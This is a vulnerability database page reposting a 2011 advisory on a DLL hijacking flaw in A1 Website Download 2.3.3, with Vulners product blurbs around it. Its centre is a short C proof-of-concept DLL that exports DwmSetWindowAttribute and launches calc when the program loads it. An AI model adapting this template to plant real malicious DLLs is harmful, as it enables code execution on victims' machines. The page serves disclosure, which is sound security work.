Lucene search
K

A1 Website Download 2.3.3 DLL Hijack

🗓️ 14 Feb 2011 00:00:00Reported by d3c0derType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 29 Views

A1 Website Download 2.3.3 DLL Hijack vulnerability in fwpuclnt.dl

Code
`  
  
#############################################  
  
A1 Website Download dll hijacking vulnerability  
software : http://www.microsystools.com  
version : 2.3.3  
author : d3c0der - [email protected]  
website : www.attackerz.ir  
  
############################################  
  
file :   
Download.exe  
Vulnerable dll :  
fwpuclnt.dll   
  
#############################################  
  
simple exploit by TheLeader and H.D. Moore   
  
#include <windows.h>  
#define DllExport __declspec (dllexport)  
DllExport void DwmSetWindowAttribute() { egg(); }  
  
int egg()  
{  
system ("calc");  
exit(0);  
return 0;  
}  
  
  
##############################################   
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

14 Feb 2011 00:00Current
0.3Low risk
Vulners AI Score0.3
29